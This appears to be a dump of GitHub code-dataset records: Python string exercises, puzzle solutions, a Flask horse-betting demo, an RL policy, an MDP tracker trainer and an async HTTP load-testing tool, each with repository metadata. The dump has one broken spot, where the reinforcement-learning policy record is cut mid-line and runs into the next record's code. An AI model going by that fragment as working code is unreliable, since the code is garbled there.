\nprint(word[0:half1]+word2+word[half1:len(word)]) #print first word of word1 to half then insert word2 and rest of word with back half of word1\n\n\n#Question 4: Create a new string made of the first, middle, and last characters of each input string\n\nword3 = input('Your word is ') #get word from user\nword4 = input('Your second word is ') #get second word\nfirst1=word3[0] #get first letter of first word\nfirst2=word4[0] #get first letter of second word \nmiddle3=word3[len(word3)//2] #get middle letter of first word\nmiddle4=word4[len(word4)//2] #get middle letter of seocnd word\nlast2=word3[len(word3)-1] #get last letter of first word\nlast3=word4[len(word4)-1] #get last letter of second word\nprint(first1+first2+middle3+middle4+last2+last3) #add all letters together \n\n\n#Question 5:Arrange string characters such that lowercase letters should come first\n\nword5 = input('Your word is ')\nlower = []\nupper = []\nfor characters in word5:\n if characters.islower(): #islower -> returns True if all characters in the string are lower case\n lower.append(characters) #append moves characters to end of list\n else:\n upper.append(characters) #append moves characters to end of list\n\nprint(lower)\nprint(upper)\nsortedWord = ''.join(lower + upper) # join() takes all items and joines them into one string\nprint('Sorted word is ', sortedWord)\n\n#!!!!! Why need ''. before join???? -> https://stackoverflow.com/questions/14868763/global-name-join-is-not-defined-django\n\n\n","repo_name":"parkc25/MorningGameDesign","sub_path":"Introduction/StringsAssignment.py","file_name":"StringsAssignment.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1083096913","text":"file = open(\"aoc21_input.txt\")\nl = file.read().split(\"\\n\")\nfile.close()\n\nd = {}\n\nall_food = set()\namount = {}\n\nfor i in l:\n s = i.split(\" (contains \")\n food = set(s[0].split())\n allergens = s[1][:-1].split(\", \")\n\n all_food |= food\n\n for j in food:\n if j in amount:\n amount.update({j: amount[j]+1})\n else:\n amount.setdefault(j, 1)\n\n for j in allergens:\n if j in d.keys():\n n = d[j] & food\n d.update({j: n})\n else:\n d.setdefault(j, food)\n\nprint(d)\n\nwhile True:\n for i in d.keys():\n if len(d[i]) == 1:\n this_food = list(d[i])[0]\n for j in d.keys():\n if i == j:\n continue\n if this_food in d[j]:\n s = d[j]\n s.remove(this_food)\n d.update({j: s})\n \n looping = False\n for i in d.keys():\n if len(d[i]) > 1:\n looping = True\n if not looping:\n break\n\nprint(d)\n\nrl = []\nfor i in sorted(d.keys()):\n rl.append(list(d[i])[0])\n\nprint(\",\".join(rl))","repo_name":"TimHuisman1703/AdventOfCode","sub_path":"2020/Day 21/aoc21_2.py","file_name":"aoc21_2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"30119032137","text":"\"\"\"\r\n\n\nGiven a list, create a function that returns a dictionary detailing how many\ntimes each element was repeated.\n\n### Examples\n\n count_repetitions([\"cat\", \"dog\", \"cat\", \"cow\", \"cow\", \"cow\"]) ➞ { cow: 3, cat: 2, dog: 1 }\n \n count_repetitions([1, 5, 5, 5, 12, 12, 0, 0, 0, 0, 0, 0]) ➞ { 0: 6, 5: 3, 12: 2, 1: 1 }\n \n count_repetitions([\"Infinity\", \"null\", \"Infinity\", \"null\", \"null\"]) ➞ { \"null\": 3, \"Infinity\": 2}\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef count_repetitions(lst):\n dic1 = {}\n for i in lst:\n if i not in dic1:\n dic1[i] = 1\n else:\n x = dic1[i]\n x += 1\n dic1[i] = x\n return dic1\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"gDtHS9cAy8Fs2X7pH_23.py","file_name":"gDtHS9cAy8Fs2X7pH_23.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2472358080","text":"st = input()\nl = len(st)\nfirstLt = int(st[0])\np = []\nfor i in range(1, l):\n p.append(i)\nlp = len(p)\nif firstLt == lp:\n print(\"TRUE {}\".format(lp))\nelse:\n print(\"FALSE {}\".format(lp))\n\n\"\"\"\ninp: 5hello\nolp: TRUE 5\n\"\"\"\n","repo_name":"rajeswari98/Python-Codes","sub_path":"LetUsCrackCodes/digitalTCS1.py","file_name":"digitalTCS1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4187488630","text":"from requests_queue.handlers.base import BaseHandler\nfrom requests_queue.serializers.request import RequestSerializer\nfrom requests_queue.domain.requests import Requests\nfrom .utils import parse_body\n\n\nclass RequestsIndexHandler(BaseHandler):\n def initialize(self, db_session):\n self.db_session = db_session\n self.requests_repo = Requests(self.db_session)\n\n def post(self):\n json = parse_body(self.request)\n request = self.requests_repo.create(json[\"creator_id\"], json[\"request\"])\n self.set_status(202)\n self.write(RequestSerializer().dump(request).data)\n\n def get(self, **kwargs):\n creator_id = self.get_argument('creator_id', None)\n requests = self.requests_repo.get_many(creator_id=creator_id)\n serialized_requests = RequestSerializer().dump(requests, many=True).data\n self.write({'requests': serialized_requests})\n","repo_name":"dod-ccpo/requests-queue","sub_path":"requests_queue/handlers/requests_index.py","file_name":"requests_index.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70927137050","text":"'''\r\n\r\nAuthor: Delzad Bamji\r\n'''\r\n\r\nfrom flask import Flask, render_template, request, redirect, g\r\n\r\nimport shelve\r\nfrom flask_restful import Resource, Api, reqparse\r\nimport sqlite3\r\nimport requests\r\nimport pandas as pd\r\nimport json\r\nimport configparser\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n# def get_db():\r\n# db = getattr(g, '_database', None)\r\n# if db is None:\r\n#\r\n# db = g._database = sqlite3.connect(\"HORSEDATA.db\")\r\n# cur = db.cursor()\r\n# cur.execute(\r\n# \"\"\"create table if not exists {} (\r\n# id integer PRIMARY KEY NOT NULL,\r\n# name text,\r\n# price integer,\r\n# age integer,\r\n# height float,\r\n# sex text)\"\"\".format(\"Horse\")\r\n# )\r\n#\r\n# with open(\"HorsePrices.csv\", \"r\") as f:\r\n# content = f.read().split(\"\\n\")\r\n# i = len(content)\r\n# for line in content:\r\n# if i == 1:\r\n# break\r\n# # print(line)\r\n# line = line.split(\",\")\r\n# sql = \"insert into Horse(id,name,price,age,height,sex) values(\" + line[1] + \",\" + \"'\" + line[\r\n# 2] + \"'\" + \",\" + line[3] + \",\" + line[4] + \",\" + line[5] + \",\" + \"'\" + line[6] + \"'\" + \")\"\r\n# cur.execute(sql)\r\n# i -= 1\r\n#\r\n# return db\r\n\r\n#\r\n# @app.teardown_appcontext\r\n# def teardown_db(exception):\r\n# db = getattr(g, '_database', None)\r\n# if db is not None:\r\n# db.close()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('configheader.properties')\r\nconfig[\"configheader\"][\"flag\"] = \"False\"\r\nwith open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n horse_data = \"\"\r\n warning = \"\"\r\n sqlstring = \"\"\r\n endpoint_info={}\r\n querying=\"\"\r\n # if post method is called after form submission\r\n if request.method == \"POST\":\r\n print(\"FORM DATA RECEIVED IN POST METHOD\")\r\n\r\n\r\n# /////////////////////////\r\n\r\n if \"nm\" in request.form:\r\n print(request.form[\"nm\"])\r\n horseName = request.form[\"nm\"]\r\n getSql = \"http://localhost:5000/horses/\"+horseName\r\n print(getSql)\r\n response = requests.get(getSql)\r\n print(response)\r\n json_data = response.json()\r\n horse_data = json_data[\"data\"]\r\n print(json_data)\r\n sqlstring = getSql\r\n endpoint_info=json_data\r\n querying=\"full\"\r\n # -------------------setting config header-----------------------#\r\n config[\"configheader\"][\"flag\"] = \"True\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n print(\"config is true\")\r\n else:\r\n print(\"config is still false\")\r\n\r\n if \"HorseId\" in request.form:\r\n print(request.form[\"HorseId\"])\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n\r\n HorseId = request.form[\"HorseId\"]\r\n HorseId = int(HorseId)\r\n if \"account\" in request.form:\r\n print(request.form[\"account\"])\r\n account = request.form[\"account\"]\r\n account = float(account)\r\n sqlstring=\"http://localhost:5000/horselist\"\r\n response2 = requests.get(sqlstring)\r\n\r\n all_horses = response2.json()[\"data\"]\r\n\r\n listall = list(all_horses[\"HorseID\"].values())\r\n\r\n if HorseId in listall:\r\n\r\n inde = list(all_horses[\"HorseID\"].keys())[list(all_horses[\"HorseID\"].values()).index(HorseId)]\r\n\r\n horse_data = {'id': all_horses[\"HorseID\"][inde], 'name': all_horses[\"name\"][inde], 'Price': all_horses[\"Price\"][inde],\r\n 'Age': all_horses[\"Age\"][inde], 'Height': all_horses[\"Height\"][inde], 'Sex': all_horses[\"Sex\"][inde]}\r\n\r\n if account>= float(horse_data['Price']):\r\n endpoint_info={\"message\":\"Successfully placed a bet on the horse\",\"data\":horse_data}\r\n else:\r\n endpoint_info = {\"message\": \"OOPS!!! Insufficient funds, check the price for the horse and try again\", \"data\": {}}\r\n else:\r\n horse_data=\"{}\"\r\n endpoint_info={\"message\":\"no horse found\",\"data\":{}}\r\n\r\n config[\"configheader\"][\"flag\"] = \"False\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n else:\r\n warning=\"{\\\"message\\\":FATAL ERROR! Please send a query in 1. before placing a bet here,\\\"data\\\":{}}\"\r\n\r\n\r\n else:\r\n # redirect(request.url)\r\n return render_template('index.html', ISO=\"\")\r\n return render_template('index.html', sql_string=sqlstring, horse_data=horse_data, endpoint_info=endpoint_info,querying=querying, warning=warning)\r\n\r\n\r\n# class HorseList(Resource):\r\n\r\n\r\nclass Horse(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\n def get(self, name):\r\n\r\n try:\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n inde = list(data[\"name\"].keys())[list(data[\"name\"].values()).index(name)]\r\n # print(inde)\r\n obj = {'id': data[\"HorseID\"][inde], 'name': data[\"name\"][inde], 'Price': data[\"Price\"][inde],\r\n 'Age': data[\"Age\"][inde], 'Height': data[\"Height\"][inde], 'Sex': data[\"Sex\"][inde]}\r\n # print(obj)\r\n if not obj:\r\n return {'message': \"no horse found\", \"data\": {}}, 404\r\n else:\r\n return {'message': \"success\", \"data\": obj}, 200\r\n\r\n except Exception as e:\r\n return {'message':\"no horse found\",\"data\":{}},404\r\n\r\n\r\nclass User(Resource):\r\n pass\r\n\r\nclass horseList(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\napi.add_resource(User, '/users')\r\n\r\napi.add_resource(Horse, '/horses/')\r\n\r\napi.add_resource(horseList, '/horselist')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, threaded=True)\r\n\r\n","repo_name":"delzadbamji/horseRacing-restAPI-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"72006352090","text":"import torch\nimport math\nimport numpy as np\nimport os\nimport io\nimport copy\nimport ctypes\nimport random\nfrom . import basic\n\nclass NN_policy(object):\n def __init__(self,actor,epsilon):\n self.actor = copy.deepcopy(actor) \n self.epsilon = epsilon \n def inference(self,obs_list):\n with torch.no_grad():\n pos = torch.Tensor(np.vstack([obs.pos for obs in obs_list])).cuda()\n laser_data = torch.Tensor(np.vstack([obs.laser_data for obs in obs_list])).cuda()\n \n action = self.actor(pos,laser_data).cpu().numpy()\n if random.random() int:\n need = sum(nums)%p\n if need ==0:\n return 0\n print(need,\"dfscdscsd\")\n n=len(nums)\n res=n\n dic=defaultdict(int)\n dic[0]=-1\n cur= 0\n for i in range(n):\n cur=(cur+nums[i])%p\n \n if (cur-need)%p in dic:\n res = min(res,i-dic[(cur-need)%p])\n dic[cur]=i\n\n return res if res args.max_iter:\n logger.info('Max iteration exceeds')\n break\n\n if len(np.where(is_good == 0)[0]) == 0:\n\n # two pass training\n if count == args.max_pass:\n break\n else:\n count += 1\n logger.info('***pass {} finished'.format(count))\n # todo change shape from (num_train) to (num_train, 1)\n is_good = np.zeros((num_train, 1))\n is_good[is_difficult == 1] = 1\n counter = np.zeros((num_train, 1))\n t = -1\n # find a sequence to train\n while True:\n t = t + 1\n if t >= num_train:\n t = 0\n if is_good[t] == 0:\n break\n\n if args.is_text:\n logger.info('Tracking sequence {}'.format(t))\n\n dres_gt = dres_train[t]\n\n # first frame\n fr = dres_gt['fr'][0]\n identity = dres_gt['id'][0]\n\n # reset tracker : Transfer the MDP to Tracked.\n tracker.prev_state = 1\n tracker.state = 1\n tracker.target_id = identity\n\n # For LSTM tracker\n tracker.prev_frames = []\n tracker.prev_det_id = []\n\n # start tracking\n while fr <= seq_num:\n if args.is_text:\n logger.info('frame {}, state {}'.format(fr, tracker.state))\n\n # extract detection\n # todo doubt\n index = np.where(dres_det['fr'] == fr)[0]\n dres = sub(dres_det, index)\n num_det = len(dres['fr'])\n\n # inactive\n if tracker.state == 0:\n if reward == 1:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n break\n\n # active\n elif tracker.state == 1:\n\n # compute overlap\n overlap, _, _ = calc_overlap(dres_gt, 0, dres, np.arange(num_det))\n ind = np.argmax(overlap)\n ov = overlap[ind]\n if args.is_text:\n logger.info('Start first frame overlap {:.2}'.format(ov))\n\n # initialize the LK tracker : Initial the target template\n tracker = lk_initialize(tracker, fr, identity, dres, ind, dres_image)\n tracker.state = 2\n tracker.streak_occluded = 0\n\n # build the dres structure\n dres_one = sub(dres, ind)\n tracker.dres = dres_one\n tracker.dres['id'] = np.array([tracker.target_id])\n tracker.dres['state'] = np.array([tracker.state])\n\n if tracker.is_lstm == 1:\n tracker = add_to_target_queue(tracker, dres_one['fr'], dres_one['id'], args.is_text)\n\n # tracker\n elif tracker.state == 2:\n tracker.streak_occluded = 0\n # todo verify mdp_value\n tracker, _, _ = mdp_value(tracker, fr, dres_image, dres, [], args)\n\n # occluded\n elif tracker.state == 3:\n tracker.streak_occluded = tracker.streak_occluded + 1\n\n # find a set of detections for association\n dres = mdp_crop_image_box(dres, dres_image['Igray'][fr - 1], tracker)\n dres, index_det, ctrack = generate_association_index(tracker, fr, dres)\n index_gt = np.where(dres_gt['fr'] == fr)[0]\n if dres_gt['covered'][index_gt] != 0:\n index_det = []\n tracker, _, f = mdp_value(tracker, fr, dres_image, dres, index_det, args)\n\n if not isempty(index_det):\n # compute reward\n reward, label, f, is_end = mdp_reward_occluded(fr, f, dres_image, dres_gt, dres, index_det, tracker,\n args, args.is_text, logger)\n\n # update weights if negative reward\n if reward == -1:\n tracker.f_occluded = np.vstack((tracker.f_occluded, f))\n tracker.l_occluded = np.append(tracker.l_occluded, label)\n # todo what is happening\n if args.is_sk_svm:\n tracker.svc_occluded = tracker.svc_occluded.fit(tracker.f_occluded, tracker.l_occluded)\n else:\n tracker.w_occluded = svm_train(tracker.l_occluded.tolist(), tracker.f_occluded.tolist(),\n '-c 1 -q -g 1 -b 1')\n logger.info('training examples in occluded state {}'.format(tracker.f_occluded.shape[0]))\n if is_end:\n tracker.state = 0\n\n # Transition to inacitve if lost for a long time\n if tracker.streak_occluded > args.max_occlusion:\n tracker.state = 0\n if len(np.where(dres_gt['fr'] == fr)[0]) == 0:\n reward = 1\n logger.info('Target exits due to long time occlusion')\n\n # check if outside image\n if tracker.state == 2:\n _, ov, _ = calc_overlap(tracker.dres, tracker.dres['fr'].shape[0] - 1, dres_image, fr - 1)\n if ov < args.exit_threshold:\n logger.info('Target outside image by checking boarders')\n tracker.state = 0\n reward = 1\n\n # try to connect recently lost target\n if not (tracker.state == 3 and tracker.prev_state == 2):\n fr = fr + 1\n\n if fr > seq_num:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n counter[t] = counter[t] + 1\n if counter[t] > max_count:\n is_good[t] = 1\n is_difficult[t] = 1\n logger.info('sequence {} mac iteration'.format(t))\n logger.info('Finish training {}'.format(seq_name))\n\n # save model\n if args.is_save:\n # save SVM\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_active')\n svm_save_model(filename, tracker.w_active)\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_occluded')\n svm_save_model(filename, tracker.w_occluded)\n w_active = tracker.w_active\n w_occluded = tracker.w_occluded\n tracker.w_active = None\n tracker.w_occluded = None\n\n filename = os.path.join(args.output_dir, args.name, seq_name + '_tracker.pkl')\n logger.info('Saving the tracker at {}'.format(filename))\n with open(filename, 'wb') as f:\n pickle.dump(tracker, f)\n tracker.w_active = w_active\n tracker.w_occluded = w_occluded\n\n return tracker\n\n\n# if __name__ == '__main__':\n# # Parse cmdline args and setup environment\n# parser = argparse.ArgumentParser(\n# 'Appearance Model',\n# formatter_class=argparse.ArgumentDefaultsHelpFormatter\n# )\n# config.add_args(parser)\n# args = parser.parse_args()\n# mdp_train()\n","repo_name":"TapanBhardwaj/MDP_Python","sub_path":"mdp_function/mdp_train.py","file_name":"mdp_train.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9389155077","text":"import asyncio\nimport copy\nimport json\nimport os\nimport statistics\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport httpx\nimport toml\nimport typer\nfrom httpx._exceptions import ConnectTimeout, HTTPError, NetworkError, ReadTimeout\nfrom jinja2 import Template\nfrom tabulate import tabulate\n\nHTTP_METHODS_FUNC_MAPPING = {\n \"GET\": \"make_get_request\",\n \"POST\": \"make_post_request\",\n \"PUT\": \"make_put_request\",\n \"PATCH\": \"make_patch_request\",\n \"DELETE\": \"make_delete_request\",\n}\n\nSUCCESS = typer.style(\"success\", fg=typer.colors.GREEN, bold=True)\nERROR = typer.style(\"error\", fg=typer.colors.RED, bold=True)\nFLOW_ERROR = typer.style(\"FLOW_ERROR\", bg=typer.colors.RED, fg=typer.colors.WHITE, bold=True)\nREQUEST_INFO = typer.style(\"REQUEST_INFO\", bg=typer.colors.GREEN, fg=typer.colors.BLACK, bold=True)\n\nREQUEST_MESSAGE = \"Request {}: name={}, url={}\"\nSTART_MESSAGE = \"Start bloodaxe, number_of_concurrent_flows={}, duration={} seconds\"\nRESPONSE_DATA_CHECK_FAILED_MESSAGE = \"Failed to check response, request={}, \" \"expected data={}, received={}\"\nRESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE = (\n \"Status code check failed, request={}, \" \"expected status_code={}, received={}\"\n)\nSECONDS_MASK = \"{0:.2f}\"\nDEFAULT_TIMEOUT = 10\n\nTABLE_HEADERS = [\n \"Total success flows\",\n \"Total error flows\",\n \"Total flows\",\n \"Mean time\",\n \"Standard deviation\",\n \"Total time\",\n]\n\nHTTP_EXCEPTIONS = (HTTPError, NetworkError, ReadTimeout, ConnectTimeout)\n\napp = typer.Typer()\n\n\nclass FlowError(Exception):\n pass\n\n\n@dataclass\nclass Flow:\n duration: float = 0\n error: FlowError = None\n success: bool = True\n\n\ndef show_request_message(status, name, url):\n message = REQUEST_MESSAGE.format(status, name, url)\n typer.echo(message)\n\n\ndef replace_with_template(context, data):\n if isinstance(data, dict):\n data = json.dumps(data)\n\n template = Template(data)\n\n return template.render(**context)\n\n\nasync def make_get_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.get(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_get_request, exc={exc}\")\n\n return resp\n\n\nasync def make_delete_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.delete(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_delete_request, exc={exc}\")\n\n return resp\n\n\nasync def make_put_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.put(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_put_request, exc={exc}\")\n\n return resp\n\n\nasync def make_patch_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.patch(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_patch_request, exc={exc}\")\n\n return resp\n\n\nasync def make_post_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.post(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_post_request, exc={exc}\")\n\n return resp\n\n\ndef check_response_data(request_name, data, expected_data, context):\n expected_data = json.loads(replace_with_template(context, expected_data))\n error_msg = RESPONSE_DATA_CHECK_FAILED_MESSAGE.format(request_name, expected_data, data)\n\n if data != expected_data:\n raise FlowError(error_msg)\n\n\ndef check_response_status_code(request_name, status_code, expected_status_code):\n error_msg = RESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE.format(\n request_name, expected_status_code, status_code\n )\n\n if status_code != expected_status_code:\n raise FlowError(error_msg)\n\n\ndef check_response(request_name, data, status_code, context, response_check=None):\n if response_check.get(\"data\"):\n check_response_data(request_name, data, response_check[\"data\"], context)\n if response_check.get(\"status_code\"):\n check_response_status_code(request_name, status_code, response_check[\"status_code\"])\n\n\nasync def make_request(context, name, url, method, response_check=None, *args, **kwargs):\n method = method.upper()\n try:\n func = eval(HTTP_METHODS_FUNC_MAPPING[method])\n except KeyError:\n raise FlowError(f\"An error ocurred when make_request, invalid http method={method}\")\n\n resp = await func(url, *args, **kwargs)\n data = resp.json()\n status_code = resp.status_code\n\n if response_check:\n check_response(name, data, status_code, context, response_check)\n\n return data\n\n\ndef show_metrics(flows, total_time):\n success_flows = [flow for flow in flows if flow.success]\n error_flows = [flow for flow in flows if flow.error]\n mean_time = 0\n standard_deviation = 0\n\n if len(success_flows) > 1:\n mean_time = statistics.mean([flow.duration for flow in success_flows])\n standard_deviation = statistics.stdev([flow.duration for flow in success_flows])\n\n row = [\n len(success_flows),\n len(error_flows),\n len(flows),\n SECONDS_MASK.format(round(mean_time, 2)),\n SECONDS_MASK.format(round(standard_deviation, 2)),\n SECONDS_MASK.format(round(total_time, 2)),\n ]\n\n typer.echo(\"\\n\")\n typer.echo(tabulate([row], headers=TABLE_HEADERS))\n\n\ndef from_file(file_path):\n with open(file_path) as f:\n try:\n data = json.load(f)\n except json.JSONDecodeError:\n raise ValueError(f\"Invalid json file, file={file_path}\")\n\n return data\n\n\ndef generate_request_data(context, data):\n if data.get(\"from_file\"):\n data = from_file(data.get(\"from_file\"))\n\n return json.loads(replace_with_template(context, data))\n\n\ndef generate_request_headers(context, headers):\n return json.loads(replace_with_template(context, headers))\n\n\ndef generate_request_params(context, params):\n return json.loads(replace_with_template(context, params))\n\n\ndef make_api_context(api_info):\n context = {}\n for api in api_info:\n context[api[\"name\"]] = {\"base_url\": api[\"base_url\"]}\n\n env_vars = api.get(\"envvars\", {})\n for key, value in env_vars.items():\n context[api[\"name\"]][key] = os.environ[value]\n\n return context\n\n\nasync def run_flow(toml_data, verbose):\n flow_config = copy.deepcopy(toml_data)\n context = make_api_context(flow_config.get(\"api\")) or {}\n start_flow_time = time.time()\n current_flow = Flow()\n\n for request in flow_config[\"request\"]:\n request[\"timeout\"] = request.get(\"timeout\") or DEFAULT_TIMEOUT\n request[\"url\"] = replace_with_template(context, request[\"url\"])\n\n if request.get(\"data\"):\n request[\"data\"] = generate_request_data(context, request[\"data\"])\n\n if request.get(\"params\"):\n request[\"params\"] = generate_request_params(context, request[\"params\"])\n\n if request.get(\"headers\"):\n request[\"headers\"] = generate_request_headers(context, request[\"headers\"])\n\n try:\n result = await make_request(context, **request)\n show_request_message(SUCCESS, request[\"name\"], request[\"url\"])\n if verbose:\n typer.secho(f\"{REQUEST_INFO}: request_name={request['name']}, response={result}\")\n except FlowError as exc:\n show_request_message(ERROR, request[\"name\"], request[\"url\"])\n current_flow.error = exc\n current_flow.success = False\n if verbose:\n typer.secho(f\"{FLOW_ERROR}: {exc}\")\n break\n\n if request.get(\"save_result\"):\n context[request[\"name\"]] = result\n\n current_flow.duration = time.time() - start_flow_time\n\n return current_flow\n\n\nasync def start(toml_data, verbose):\n flows = tuple()\n duration = toml_data[\"configs\"][\"duration\"]\n number_of_concurrent_flows = toml_data[\"configs\"][\"number_of_concurrent_flows\"]\n\n typer.secho(\n START_MESSAGE.format(number_of_concurrent_flows, duration),\n fg=typer.colors.CYAN,\n underline=True,\n bold=True,\n )\n\n start_time = time.time()\n while True:\n elapsed_seconds = time.time() - start_time\n\n if elapsed_seconds >= duration:\n break\n\n results = await asyncio.gather(\n *[run_flow(toml_data, verbose) for _ in range(number_of_concurrent_flows)]\n )\n\n flows += tuple(results)\n\n show_metrics(flows, elapsed_seconds)\n\n\n@app.command()\ndef main(flow_config_file: Path, verbose: bool = False):\n try:\n toml_data = toml.load(flow_config_file)\n except (TypeError, toml.TomlDecodeError):\n typer.echo(\"Invalid toml file\")\n else:\n asyncio.run(start(toml_data, verbose))\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"rfunix/bloodaxe","sub_path":"bloodaxe.py","file_name":"bloodaxe.py","file_ext":"py","file_size_in_byte":9585,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"40613851937","text":"# -*- coding:utf-8 -*-\n\nimport re\nimport random\n\nfrom utils import testcase_handler\n\n\n# @ResponseDependMulti('A-002','industryNo','data')\n# @PayloadDepend('A-001','industryNam')\n\n\ndef ResponseDependMulti(case_no, keyword, dto):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # 获取当前case_no完整信息\n responsebody = eval(str(caseinfo[13]))\n if '#' not in dto:\n for data in responsebody[dto]:\n return data[str(keyword)]\n elif '#' in dto:\n jsonpath = re.split('#', dto)\n print(jsonpath)\n for i in range(len(jsonpath)):\n print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][jsonpath[i]]\n else:\n responsebody = responsebody[jsonpath[i]]\n # print(responsebody[str(keyword)])\n # print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][keyword]\n print(responsebody)\n return responsebody\n else:\n return responsebody[keyword]\n else:\n pass\n\n\ndef PayloadDepend(case_no, keyword):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # 获取当前case_no完整信息\n requestbody = eval(str(caseinfo[17]))\n return requestbody[keyword]\n\n\n# @RString('u','10')\n# re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1)\n# print(re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1))\ndef RString(flag, length):\n u_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZ'\n l_str = 'abcdefghigklmnopqrstuvwxyz'\n m_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz'\n if flag == 'u':\n \"\"\"获取指定长度的大写字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += u_str[random.randint(0, len(u_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'l':\n \"\"\"获取指定长度的小写字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += l_str[random.randint(0, len(l_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'm':\n \"\"\"获取指定长度的大小写混合字母\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += m_str[random.randint(0, len(m_str) - 1)]\n # print(random_str)\n return random_str\n\n\ndef RNum(length):\n randstart = 10 ** (length - 1)\n randend = (10 ** length) - 1\n return random.randint(randstart, randend)\n\n\ndef test():\n pass\n","repo_name":"Bikankan/ApiAutomatic-1","sub_path":"utils/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
